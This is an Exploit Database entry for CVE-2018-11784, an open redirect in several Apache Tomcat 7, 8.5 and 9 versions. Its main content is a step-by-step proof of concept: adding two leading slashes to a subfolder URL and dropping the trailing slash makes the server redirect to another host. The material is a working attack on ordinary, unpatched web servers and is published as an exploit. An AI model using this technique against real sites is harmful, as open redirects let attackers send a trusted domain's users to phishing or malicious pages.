Apache Tomcat 9.0.0.M1 – Open Redirect

• Exploit Database
• 16 阅读

• 作者： Central InfoSec
  日期： 2021-07-13
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50118/

• # Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
  # Date: 10/04/2018
  # Exploit Author: Central InfoSec
  # Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
  # CVE : CVE-2018-11784
  
  # Proof of Concept:
  
  # Identify a subfolder within your application
  http://example.com/test/
  
  # Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
  http://example.com//test
  
  # Browse to the newly created URL and the application will perform a redirection
  http://test/